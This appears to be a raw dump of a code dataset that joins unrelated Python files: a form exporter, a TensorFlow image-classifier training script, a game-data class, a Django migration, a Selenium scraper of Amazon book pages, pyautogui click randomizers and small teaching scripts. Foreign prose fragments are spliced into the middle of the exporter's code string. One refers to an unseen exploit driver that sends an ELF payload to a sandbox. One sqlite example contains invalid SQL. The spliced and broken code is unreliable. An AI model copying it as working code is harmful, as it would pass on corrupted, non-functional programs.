}\n\n mods = f.get('compare_method', '').split('-')\n if 'int' in mods:\n field['type'] = 'number'\n elif 'float' in mods:\n field['type'] = 'number'\n elif 'regexp' in mods:\n field['pattern'] = f['correct']\n if 'more' in f:\n field['description'] = f['more']\n\n if 'options' in f:\n titleMap = {}\n enum = []\n m = 0\n for o in f['options']:\n v = o.get('value', 'option_' + str(m))\n titleMap[v] = o.get('label|i18n', o.get('label', ['missing']))\n enum.append(v)\n m += 1\n field['titleMap'] = titleMap\n field['enum'] = enum\n\n if 'extra_info' in 
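The exploit driver above frames its payload as a 4-byte little-endian length followed by the raw ELF bytes (`p32(len(payload)) + payload`), matching the sandbox's "Reading ELF" loop. The framing without pwntools:

```python
import struct

def frame_payload(payload: bytes) -> bytes:
    # 4-byte little-endian length prefix, then the raw bytes (pwntools' p32)
    return struct.pack('<I', len(payload)) + payload

framed = frame_payload(b'\x7fELF...')
assert framed[:4] == struct.pack('<I', len(framed) - 4)
```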
f:\n field.update(f['extra_info'])\n\n if 'class' in field:\n field['htmlClass'] = field['class']\n del(field['class'])\n\n return field\n\n if t == 'access.types.stdsync.createForm':\n n = 0\n for fg in exercise.get('fieldgroups', []):\n for f in fg.get('fields', []):\n t = f['type']\n\n if t == 'table-radio' or t == 'table-checkbox':\n for row in f.get('rows', []):\n rf = f.copy()\n rf['type'] = t[6:]\n if 'key' in row:\n rf['key'] = row['key']\n if 'label' in row:\n rf['title'] += ': ' + row['label']\n form.append(field_spec(rf, n))\n n += 1\n\n if 'more_text' in rf:\n form.append({\n 'key': rf.get('key', 'field_' + str(n)) + '_more',\n 'type': 'text',\n 'title': rf['more_text'],\n 'required': False,\n })\n n += 1\n else:\n form.append(field_spec(f, n))\n n += 1\n\n elif t == 'access.types.stdasync.acceptPost':\n for f in exercise.get('fields', []):\n form.append({\n 'key': f['name'],\n 'type': 'textarea',\n 'title': f['title'],\n 'requred': f.get('required', False),\n })\n\n elif t == 'access.types.stdasync.acceptFiles':\n for f in exercise.get('files', []):\n form.append({\n 'key': f['field'],\n 'type': 'file',\n 'title': f['name'],\n 'required': f.get('required', True),\n })\n return form\n","sub_path":"util/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"199383897","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 24 12:19:05 2020\n\n@author: Kim Bjerge\n\"\"\"\n\n\n# %Reference - https://www.tensorflow.org/tensorboard/hyperparameter_tuning_with_hparams\n# Last accessed 18/12/19\n#https://stackoverflow.com/questions/38543850/tensorflow-how-to-display-custom-images-in-tensorboard-e-g-matplotlib-plots\n# Last accessed 18/12/19\n\n# activate moths\n# Anaconda: \n# conda install scikit-learn\n# conda install seaborn\n\n#%load_ext tensorboard\nimport tensorflow as tf\nimport io\n\n## LIMIT MEMORY - Can be uncommented\nconfig = tf.compat.v1.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.4\nsession = tf.compat.v1.Session(config=config)\n\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn\n\nfrom tensorboard.plugins.hparams import api as hp\n\nprint(tf.__version__)\nprint(sklearn.__version__)\n\n##\n\n# Directory with subdirectories for each class with cropped images in jpg format\ndata_dir = '../10classes_mixed'\n\n# Directory for saving tensorboard model parameters\nhparam_dir = '..\\\\hparam_tuning' # Windows path\n#hparam_dir = '../hparam_tuning' # Linux path\n\n# Directory for saving h5 models for each run\nmodels_dir = '../models_save'\n\ngen = True # Enable data augmentation\n\n##\n\nnumber_of_classes = 10\nbatch_size = 32\nepochs = 30\nimage_size = 128\nseed = 1\n\ntrain_datagen = tf.keras.preprocessing.image.ImageDataGenerator(rescale=1./255,\n rotation_range = 180,\n horizontal_flip = True,\n vertical_flip = True,\n zoom_range=0.3,\n validation_split=0.2,\n brightness_range = [0.9, 1.1])\n\ntrain_generator = train_datagen.flow_from_directory(\n data_dir,\n shuffle = True,\n target_size=(image_size, image_size),\n batch_size=batch_size,\n class_mode='categorical',\n subset='training',\n seed = seed)\n\nvalidation_datagen = tf.keras.preprocessing.image.ImageDataGenerator(rescale=1./255) \nvalidation_generator = train_datagen.flow_from_directory(\n data_dir,\n target_size=(image_size, image_size),\n 
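The exporter builds absolute URLs by feeding `reverse()` output to `request.build_absolute_uri()`. The helper pattern in isolation (on current Django, `django.urls.reverse` replaces the `django.core.urlresolvers` import used above):

```python
from django.urls import reverse

def absolute_url(request, name, *args):
    # reverse() produces the path; the request supplies scheme and host
    return request.build_absolute_uri(reverse(name, args=args))

# usage inside a view:
#   absolute_url(request, 'exercise', course_key, exercise_key)
```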
batch_size=batch_size,\n class_mode='categorical',\n subset='validation',\n shuffle=False,\n seed=seed\n)\n\n##\n\n# Selected best model finnaly used (Paper rating no. 3)\nHP_OPTIMIZER = hp.HParam('optimizer', hp.Discrete(['adam']))\nHP_KERNEL_SIZE1 = hp.HParam('kern_size1', hp.Discrete([5]))\nHP_KERNEL_SIZE2 = hp.HParam('kern_size2', hp.Discrete([3]))\nHP_NUM_FILTERS1 = hp.HParam('num_filters1', hp.Discrete([32])) \nHP_NUM_FILTERS2 = hp.HParam('num_filters2', hp.Discrete([64])) \nHP_NUM_UNITS = hp.HParam('num_units', hp.Discrete([512]))\n\n# Hyperparameter tuning used to find optimal model\n#HP_OPTIMIZER = hp.HParam('optimizer', hp.Discrete(['adam','sgd']))\n#HP_KERNEL_SIZE1 = hp.HParam('kern_size1', hp.Discrete([3,5]))\n#HP_KERNEL_SIZE2 = hp.HParam('kern_size2', hp.Discrete([1,3]))\n#HP_NUM_FILTERS1 = hp.HParam('num_filters1', hp.Discrete([32, 64])) \n#HP_NUM_FILTERS2 = hp.HParam('num_filters2', hp.Discrete([64, 128])) \n#HP_NUM_UNITS = hp.HParam('num_units', hp.Discrete([256, 512]))\n\nMETRIC_ACCURACY = 'accuracy'\nMETRIC_F1 = 'f1'\n \nwith tf.summary.create_file_writer(hparam_dir).as_default():\n hp.hparams_config(\n hparams=[HP_NUM_UNITS,\n HP_OPTIMIZER,\n HP_NUM_FILTERS1,\n HP_NUM_FILTERS2,\n HP_KERNEL_SIZE1,\n HP_KERNEL_SIZE2],\n metrics=[hp.Metric(METRIC_ACCURACY, display_name='Accuracy'), hp.Metric(METRIC_F1, display_name='F1 Score')],\n )\n \n##\n\ndef train_test_model(logdir, hparams, count): \n model = tf.keras.models.Sequential()\n #Block 1\n model.add(tf.keras.layers.Conv2D(hparams[HP_NUM_FILTERS1], kernel_size=hparams[HP_KERNEL_SIZE1], input_shape=(image_size,image_size, 3), padding='same'))\n model.add(tf.keras.layers.ReLU())\n model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\n #Block 2 \n model.add(tf.keras.layers.Conv2D(64, kernel_size=(3,3), input_shape=(image_size,image_size, 3),padding='same'))\n model.add(tf.keras.layers.ReLU())\n model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\n #Block 3 \n model.add(tf.keras.layers.Conv2D(64, kernel_size=(3,3), input_shape=(image_size,image_size, 3),padding='same'))\n model.add(tf.keras.layers.ReLU())\n model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\n #Block 4\n model.add(tf.keras.layers.Conv2D(hparams[HP_NUM_FILTERS2], hparams[HP_KERNEL_SIZE2], input_shape=(image_size,image_size, 3),padding='same'))\n model.add(tf.keras.layers.ReLU())\n model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\n #Dense\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(hparams[HP_NUM_UNITS], activation='relu'))\n model.add(tf.keras.layers.Dropout(0.3))\n #Output\n model.add(tf.keras.layers.Dense(number_of_classes, activation='softmax')) # NUM CLASSES\n #model.add(tf.keras.layers.Dense(10,activation='sigmoid')) # NUM CLASSES\n model.compile(optimizer=hparams[HP_OPTIMIZER],\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n \n model.summary()\n print(\"Learnable parameters:\", model.count_params())\n \n if not gen:\n model.fit(x_train, y_train, \n epochs = epochs,\n batch_size = batch_size,\n callbacks=[tf.keras.callbacks.TensorBoard(logdir),#log metrics \n hp.KerasCallback(logdir, hparams), #log hparams\n ],)\n _, accuracy = model.evaluate(x_test, y_test)\n y_predicted = model.predict(x_test)\n y_pred = np.argmax(y_predicted, axis=1)\n y_true = np.argmax(y_test, axis=1)\n \n print(y_pred.shape)\n print(y_true.shape)\n report = classification_report(y_true, y_pred, output_dict=True)\n print(classification_report(y_true, y_pred))\n f1_score = report['weighted avg']['f1-score']\n return 
accuracy, f1_score, y_pred\n else:\n train_datagen = tf.keras.preprocessing.image.ImageDataGenerator(rescale=1./255,\n rotation_range = 180,\n horizontal_flip = True,\n vertical_flip = True,\n zoom_range=0.3,\n validation_split=0.2,\n brightness_range = [0.9, 1.1])\n\n train_generator = train_datagen.flow_from_directory(\n data_dir,\n shuffle = True,\n target_size=(image_size, image_size),\n batch_size=batch_size,\n class_mode='categorical',\n subset='training',\n seed = seed)\n\n validation_datagen = tf.keras.preprocessing.image.ImageDataGenerator(rescale=1./255) \n validation_generator = train_datagen.flow_from_directory(\n data_dir,\n target_size=(image_size, image_size),\n batch_size=batch_size,\n class_mode='categorical',\n subset='validation',\n shuffle=False,\n seed=seed\n )\n print('Model train using generator')\n model.fit_generator(train_generator,\n steps_per_epoch=(1984//batch_size)*4,\n epochs=epochs,\n callbacks=[\n tf.keras.callbacks.TensorBoard(logdir), # log metrics\n hp.KerasCallback(logdir, hparams), # log hparams\n ],)\n print('Model evaluate')\n _, accuracy = model.evaluate_generator(validation_generator)\n print('Model predict')\n Y_pred = model.predict_generator(validation_generator) #, 173//batch_size+1\n y_pred = np.argmax(Y_pred, axis=1)\n print('Confusion Matrix')\n print(classification_report(validation_generator.classes, y_pred))\n report = classification_report(validation_generator.classes, y_pred, output_dict=True)\n f1_score = report['weighted avg']['f1-score']\n model.save(models_dir + '/' + str(count) + '.h5')\n return accuracy, f1_score, y_pred\n\n##\n \n#https://androidkt.com/keras-confusion-matrix-in-tensorboard/\ndef run(run_dir, hparams, count):\n if not gen:\n with tf.summary.create_file_writer(run_dir).as_default():\n hp.hparams(hparams) # record the values used in this trial\n accuracy, f1_score, y_pred = train_test_model(run_dir, hparams)\n tf.summary.scalar(METRIC_ACCURACY, accuracy, step=1)\n tf.summary.scalar(METRIC_F1, f1_score, step=1)\n conf = confusion_matrix(np.argmax(y_test, axis=1), y_pred)\n figure = plt.figure(figsize=(8, 8))\n sns.heatmap(conf, annot=True,cmap=plt.cm.Blues)\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n buf = io.BytesIO()\n plt.savefig(buf, format='png')\n plt.close(figure)\n buf.seek(0)\n image = tf.image.decode_png(buf.getvalue(), channels=4)\n image = tf.expand_dims(image, 0)\n tf.summary.image(\"Confusion Matrix/scoref1:_\" + str(f1_score), image, step=1)\n else:\n with tf.summary.create_file_writer(run_dir).as_default():\n hp.hparams(hparams) # record the values used in this trial\n accuracy, f1_score, y_pred = train_test_model(run_dir, hparams, count)\n tf.summary.scalar(METRIC_ACCURACY, accuracy, step=1)\n tf.summary.scalar(METRIC_F1, f1_score, step=1)\n conf = confusion_matrix(validation_generator.classes, y_pred)\n figure = plt.figure(figsize=(8, 8))\n sns.heatmap(conf, annot=True,cmap=plt.cm.Blues)\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n buf = io.BytesIO()\n plt.savefig(buf, format='png')\n plt.close(figure)\n buf.seek(0)\n image = tf.image.decode_png(buf.getvalue(), channels=4)\n image = tf.expand_dims(image, 0)\n tf.summary.image(\"Confusion Matrix/scoref1:_\" + str(f1_score) + '_run_' + str(count), image, step=1)\n \n##\n \nsession_num = 0\nfor num_units in HP_NUM_UNITS.domain.values:\n for optimizer in HP_OPTIMIZER.domain.values:\n for kern_size1 in HP_KERNEL_SIZE1.domain.values:\n for kern_size2 in 
HP_KERNEL_SIZE2.domain.values:\n for num_filters1 in HP_NUM_FILTERS1.domain.values:\n for num_filters2 in HP_NUM_FILTERS2.domain.values:\n hparams = {\n HP_NUM_UNITS: num_units,\n HP_OPTIMIZER: optimizer,\n HP_KERNEL_SIZE1: kern_size1,\n HP_KERNEL_SIZE2: kern_size2,\n HP_NUM_FILTERS1: num_filters1,\n HP_NUM_FILTERS2: num_filters2\n }\n run_name = \"run-%d\" % session_num\n print('--- Starting trial: %s' % run_name)\n print({h.name: hparams[h] for h in hparams})\n run(hparam_dir + '\\\\' + run_name, hparams, session_num) # Windows path\n #run(hparam_dir + '/' + run_name, hparams, session_num) # Linux path\n session_num += 1\n \n#model.summary()\n","sub_path":"code/hp_param_training.py","file_name":"hp_param_training.py","file_ext":"py","file_size_in_byte":11401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"507426355","text":"from source.util.utils import Utils\n\n# Holds structure for a Level\n\n\nclass Level:\n def __init__(self, lid, name, rank, min_skill, max_skill, price=0, min_xp_level=0):\n self.__id = int(lid)\n self.__name = name\n self.__rank = rank\n self.__price = int(price)\n self.__min_skill = int(min_skill)\n self.__max_skill = int(max_skill)\n self.__min_xp_level = int(min_xp_level)\n self.__trainer_ids = []\n self.__quest_ids = []\n self.__item_id = 0\n\n # Get the id of the level\n def get_id(self):\n return self.__id\n\n def get_name(self):\n return self.__name\n\n # Returns the total amount of sources\n def get_total_amount_of_sources(self, shared_items):\n total_amount = len(self.__trainer_ids)\n if len(self.__quest_ids) > 0:\n total_amount += 1\n if self.__item_id > 0:\n total_amount += shared_items[self.__item_id].get_total_amount_of_sources(shared_items)\n\n return total_amount\n\n # Returns the max amount of sources and its type\n def get_max_amount_of_one_source(self, shared_items):\n max_type = \"Trainer\"\n max_amount = len(self.__trainer_ids)\n if len(self.__quest_ids) > 0 and max_amount < 1:\n max_amount = 1\n max_type = \"Quest\"\n if self.__item_id > 0:\n item_amount = shared_items[self.__item_id].get_max_amount_of_one_source(shared_items)\n if item_amount[0] > max_amount:\n max_amount = item_amount[0]\n max_type = \"Item - \" + item_amount[1]\n\n return [max_amount, max_type]\n\n # Get the item id of the level\n def get_item_id(self):\n return self.__item_id\n\n # Returns the amount of different ways the item can be obtained\n def get_amount_of_different_sources(self):\n amount_sources = 0\n if len(self.__trainer_ids) > 0:\n amount_sources += 1\n if len(self.__quest_ids) > 0:\n amount_sources += 1\n if self.__item_id > 0:\n amount_sources += 1\n return amount_sources\n\n # set the quest from which skill is obtained\n def add_quest_id(self, quest_id):\n if quest_id not in self.__quest_ids:\n self.__quest_ids.append(int(quest_id))\n self.__quest_ids = sorted(self.__quest_ids)\n\n def set_item_id(self, item_id):\n self.__item_id = int(item_id)\n\n # the the ids of the quests that learns the skill\n def get_quest_ids(self):\n return self.__quest_ids\n\n def get_rank(self):\n return self.__rank\n\n def get_amount_of_sources(self):\n amount_of_sources = len(self.__trainer_ids)\n amount_of_sources += len(self.__quest_ids)\n if self.__item_id > 0:\n amount_of_sources += 1\n\n return amount_of_sources\n\n def get_trainer_ids(self):\n return self.__trainer_ids\n\n def add_trainer_id(self, trainer_id):\n if trainer_id not in self.__trainer_ids:\n self.__trainer_ids.append(int(trainer_id))\n self.__trainer_ids = 
sorted(self.__trainer_ids)\n\n def as_string(self, indent=\"\"):\n as_str = indent + \"{\\n\"\n as_str += indent + \"\\tid = \" + str(self.__id) + \",\\n\"\n as_str += indent + \"\\tname = \" + '\"' + self.__rank + \" \" + self.__name + '\"' + \",\\n\"\n as_str += indent + \"\\tmin_skill = \" + str(self.__min_skill) + \",\\n\"\n as_str += indent + \"\\tmax_skill = \" + str(self.__max_skill) + \",\\n\"\n # only add if filled\n if self.__min_xp_level > 0:\n as_str += indent + \"\\tmin_xp_level = \" + str(self.__min_xp_level) + \",\\n\"\n if len(self.__trainer_ids) > 0:\n as_str += indent + \"\\ttrainers = {\\n\"\n as_str += indent + \"\\t\\tprice = \" + str(self.__price) + \",\\n\"\n as_str += indent + \"\\t\\tsources = { \" + Utils.get_list_as_string(self.__trainer_ids) + \"},\\n\"\n as_str += indent + \"\\t},\\n\"\n # add ids of quests if any\n if len(self.__quest_ids) > 0:\n as_str += indent + \"\\tquests = {\" + Utils.get_list_as_string(self.__quest_ids) + \"},\\n\"\n # only add if recipe is present\n if self.__item_id > 0:\n as_str += indent + \"\\titem = \" + str(self.__item_id) + \",\\n\"\n as_str += indent + \"},\\n\"\n\n return as_str\n","sub_path":"source/wow_object/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602614548","text":"from Instrucciones.TablaSimbolos.Instruccion import Instruccion\n\nclass CreateTable(Instruccion):\n def __init__(self, id, tipo, campos, ids, linea, columna):\n Instruccion.__init__(self,tipo,linea,columna)\n self.valor = id\n self.campos = campos\n self.ids = ids\n\n def ejecutar(self, tabla, arbol):\n super().ejecutar(tabla,arbol)\n print(self.valor + \" linea: \" + str(self.linea) + \" columna: \" + str(self.columna))\n'''\ninstruccion = CreateTable(\"hola mundo\",None, 1,2)\n\ninstruccion.ejecutar(None,None)\n'''","sub_path":"parser/team08/Tytus_SQLPARSER_G8/Instrucciones/Sql_create/CreateTable.py","file_name":"CreateTable.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"531695650","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('replays', '0046_auto_20150128_1858'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='ownerdata',\n name='teamuser',\n field=models.ForeignKey(related_name='owner', blank=True, to='replays.TeamUser', null=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='replay',\n name='upload_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 1, 28, 19, 1, 50, 656000), null=True, blank=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='textpost',\n name='upload_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 1, 28, 19, 1, 50, 657000), null=True, blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"replays/migrations/0047_auto_20150128_1901.py","file_name":"0047_auto_20150128_1901.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"469891455","text":"import time\nfrom urllib.request import urlretrieve\nimport subprocess\nfrom selenium import webdriver\n\ndriver = 
webdriver.PhantomJS(executable_path='C:/Users/user/Downloads/phantomjs-2.1.1-windows/phantomjs-2.1.1-windows/bin/phantomjs.exe')\ndriver.get('http://www.amazon.com/War-Peace-Leo-Nikolayevich-Tolstoy/dp/1427030200')\ntime.sleep(2)\n\ndriver.find_element_by_id('sitbLogoImg').click()\nimageList = set()\n\ntime.sleep(5)\n#Пока кнопка со стрелкой вправо кликабельна, переворачиваем страницу\nwhile 'pointer' in driver.find_element_by_id('sitbReaderRightPageTurner').get_attribute('style'):\n driver.find_element_by_id(\"sitbReaderRightPageTurner\").click()\n time.sleep(2)\n #Ищем URL-адреса изображений на всех загруженных страницах (могут загрузиться сразу несколько страниц, но дупликаты не будут добавлены в набор)\n pages = driver.find_elements_by_xpath(\"//div[@class='pageImage']/div/img\")\n print(pages)\n for page in pages:\n print(page.get_attribute('src'))\n image = page.get_attribute('src')\n imageList.add(image)\n\ndriver.quit()\n\n# Начинаем обработку изображений, собранных с URL-адресов, с помощью Tesseract\n\nfor image in sorted(imageList):\n urlretrieve(image, 'page.jpg')\n p = subprocess.Popen(['tesseract', 'page.jpg', 'page'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p.wait()\n f = open('page.txt', 'r')\n print(f.read())","sub_path":"work_with_images/must_have_image_scraping.py","file_name":"must_have_image_scraping.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"403442853","text":"import random\nimport pyautogui\n\npyautogui.PAUSE = 0.5 #default pause between functions\n\ndef randomize_coord(coord):\n #Randomizes a single coordinate in a small range\n lower = coord - 3\n upper = coord + 3\n return random.randint(lower, upper)\n\ndef move_to_and_click(x, y, btn):\n #specify x coord, right coord, and left or right mouse button\n if btn == 'right':\n pyautogui.moveTo(x, y)\n pyautogui.click(x, y, button=btn)\n else: #defaults to left click\n pyautogui.moveTo(x,y)\n pyautogui.click(x,y)\n print('Left Clicking Coordinates X={} Y={}'.format(x,y))\n\ndef rand_float(start, end):\n rf = random.random() * (end - start) + start\n print('Sleeping {} Seconds'.format(str(round(rf, 2)))) #rounds float to two decimal places\n return rf","sub_path":"randomizers.py","file_name":"randomizers.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"526161550","text":"class Arithmatic:\t\t\t\t#class defination\r\n\tvalue = 101\t\t\t\t\t#class variable\r\n\tdef __init__(self, i, j):\t\t\t#class constructor\r\n\t\tprint(\"Inside constructor\")\r\n\t\tself.no1=i \t\t\t\t#class instance variable\r\n\t\tself.no2=j\t\t\t\t#class instance variable\r\n\tdef Add(self):\t\t\t\t#instance method\t\r\n\t\treturn self.no1+self.no2\r\n\r\n\tdef Sub(self):\t\t\t\t#instance method\r\n\t\treturn self.no1-self.no2\r\n\t\r\ndef main():\r\n\tprint(\"Value is:\",Arithmatic.value)\r\n\t\r\n\tobj1 = Arithmatic(21,11)\t\t#__init__(obj1,21,11)\r\n\tobj2 = Arithmatic(101,51) \t\t#__init__(obj2,101,51)\r\n\tprint(\"Value is:\",obj1.value)\r\n\r\n\tret = obj1.Add()\r\n\tprint(\"Addition is:\",ret)\t\t\t\t#ret = Add(obj1)\r\n\tret = obj1.Sub()\r\n\tprint(\"Substraction is:\",ret)\r\n\r\n\tret = obj2.Add()\r\n\tprint(\"Addition is:\",ret)\t\t\t\t#ret = Add(obj1)\r\n\tret = obj2.Sub()\r\n\tprint(\"Substraction is:\",ret)\r\n\r\n\r\nif __name__ == 
'__main__':\r\n\t\tmain()\t","sub_path":"OOP4.py","file_name":"OOP4.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"393802748","text":"\n\nfrom xai.brain.wordbase.verbs._rule import _RULE\n\n#calss header\nclass _RULES(_RULE, ):\n\tdef __init__(self,): \n\t\t_RULE.__init__(self)\n\t\tself.name = \"RULES\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"rule\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_rules.py","file_name":"_rules.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"538891262","text":"# -*- coding: utf8 -*-\n\n# import configuration in parent dir\nimport os, sys, inspect\n\ncurrent_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparent_dir = os.path.dirname(current_dir)\nsys.path.insert(0, parent_dir)\nimport configuration as conf\n# import packages in models\nfrom models import data_processing, database_management, file_management\n\nif __name__ == '__main__':\n # change working directory to project location\n abspath = os.path.abspath(__file__)\n dname = os.path.dirname(os.path.dirname(abspath))\n os.chdir(dname)\n\n # script parameters\n searching_type = sys.argv[1]\n search_element = sys.argv[2]\n search_content = sys.argv[3]\n if_export = sys.argv[4]\n export_path = sys.argv[5]\n\n config = conf.auto_log_in(\"cardo_main\")\n\n # main process starts\n simple_connection = database_management.SimpleConnection(config)\n\n search = \"是否計算黑名單\" if searching_type == \"0\" else \"CARDO點數\"\n\n if if_export == \"0\":\n simple_connection.point_search(search, search_element, search_content)\n else:\n simple_connection.point_search(search, search_element, search_content, export_path)\n","sub_path":"DBUIScripts/black_list_search.py","file_name":"black_list_search.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"555532925","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 11 15:34:18 2015\n\n@author: RNEL\n\"\"\"\n\nimport sys\n\nPY2 = int(sys.version[0]) == 2\n\nif PY2:\n import urlparse\n urlparse = urlparse\nelse:\n import urllib.parse\n urlparse = urllib.parse\n\ndef encode_if_py2(func):\n \"\"\"If Python 2.x, return decorated function encoding unicode return value\n to UTF-8; else noop.\n \"\"\"\n if not PY2:\n return func\n def wrapped(*args, **kwargs):\n ret = func(*args, **kwargs)\n if not isinstance(ret, unicode):\n raise TypeError('Wrapped function must return `unicode`')\n return ret.encode('utf-8', 'ignore')\n return wrapped\n \ndef get_opening_tag_text(tag,attrs_to_include=None):\n \n \"\"\"\n This returns the text for an opening tag.\n e.g. 
if the opening tag was \n This would literally retun that tag string, \n rather than an \"anchor\" tag with a \"href\" attribute\n \n I couldn't find out how to do this throuh Beautifulsoup\n \"\"\"\n \n if attrs_to_include is None:\n return '<%s %s>' % (tag.name,' '.join(['%s=\"%s\"'%(key,value) for key,value in tag.attrs.items()]))\n else:\n return '<%s %s>' % (tag.name,' '.join(['%s=\"%s\"'%(key,value) for key,value in tag.attrs.items() if key in attrs_to_include]))","sub_path":"pyWebForm/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"303493755","text":"#!/usr/bin/env python\n\nimport sqlite3\n\nwith sqlite3.connect(\"../DATA/presidents.db\") as s3conn: # <1>\n\n s3cursor = s3conn.cursor() # <2>\n\n # select first name, last name from all presidents\n s3cursor.execute('''\n select firstname, lastname, party\n from presidents\n ''') # <3>\n\n print(\"Sqlite3 does not provide a row count\\n\") # <4>\n \n for row in s3cursor.fetchall(): # <5>\n print(row) # <6>\n\n\n try:\n s3cursor.execute(\"\"\"\n update presidents insert (lastname, firstname)\n values ('Scott', 'Ion')\n \"\"\")\n except sqlite3.DatabaseError as err:\n s3conn.rollback()\n else:\n s3conn.commit()\n","sub_path":"EXAMPLES/db_sqlite_basics.py","file_name":"db_sqlite_basics.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"463342961","text":"import pytest\n\nfrom api.searches.serializers import SearchSerializer\nfrom constants import content_types\nfrom db.models.searches import Search\nfrom factories.factory_searches import SearchFactory\nfrom factories.factory_users import UserFactory\nfrom tests.utils import BaseTest\n\n\n@pytest.mark.search_mark\nclass TestSearchSerializer(BaseTest):\n DISABLE_RUNNER = True\n model_class = Search\n expected_keys = {\n 'id',\n 'name',\n 'query',\n }\n\n def setUp(self):\n super().setUp()\n self.user = UserFactory()\n self.obj1 = SearchFactory()\n self.obj2 = SearchFactory(content_type=content_types.BUILD_JOB)\n\n def test_serialize_one(self):\n data = SearchSerializer(self.obj1).data\n\n assert set(data.keys()) == self.expected_keys\n\n for k, v in data.items():\n assert getattr(self.obj1, k) == v\n\n def test_serialize_many(self):\n data = SearchSerializer(Search.objects.all(), many=True).data # noqa\n assert len(data) == 2\n for d in data:\n assert set(d.keys()) == self.expected_keys\n","sub_path":"tests/test_searches/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"118341170","text":"\"\"\"\r\nWAP that infinitely receives positive integer as input and prints its square.\r\nIf a negative number is entered then raise an exception, display relevant error message and\r\nmake a graceful exit.\r\n\"\"\"\r\ntry:\r\n while True:\r\n num = int(input('Enter a positive number:'))\r\n if num >= 0:\r\n print(num*num)\r\n else:\r\n raise ValueError('Negative number')\r\nexcept ValueError as ve:\r\n print(ve.args)\r\n","sub_path":"Chapter-15-Exception-Handling/Example/1-number-square.py","file_name":"1-number-square.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"75963694","text":"n = 10\n\nprint(\"O(n^2)\")\n\nfor i in range 
(0,n):\n for j in range (0,n):\n print(i,j)\n\nprint(\"O(n^2)\")\n\nfor i in range(0,n):\n for j in range(0,j):\n print(i,j)\n\nprint(\"O(sqrt(N))\")\n\ni = 1\nwhile i*i', \"\", str(body.find(\"p\")).split(\"
\")[2].split(\"\")[1])\n\t\t\tresearch = re.sub(r'
', \"\", research).strip()\n\t\t\tresearch = research.replace(\";\", \",\")\n\t\t\tret.append([name, \"UCB\", research, homepage])\n\t\texcept:\n\t\t\tret.append([name, \"UCB\", \"\", homepage])\n\n\treturn ret\n\nif __name__ == '__main__':\n\tres = getFacultyDetail()\n\twith io.open(\"data/ucb.csv\", \"w\", encoding=\"utf8\") as f:\n\t\tf.write(\"Professor;University;Research Interest;Homepage\\n\")\n\t\tfor item in res:\n\t\t\tf.write(\"%s\\n\" % \";\".join(item))","sub_path":"ucb.py","file_name":"ucb.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"472681395","text":"##\n# See the file COPYRIGHT for copyright information.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is 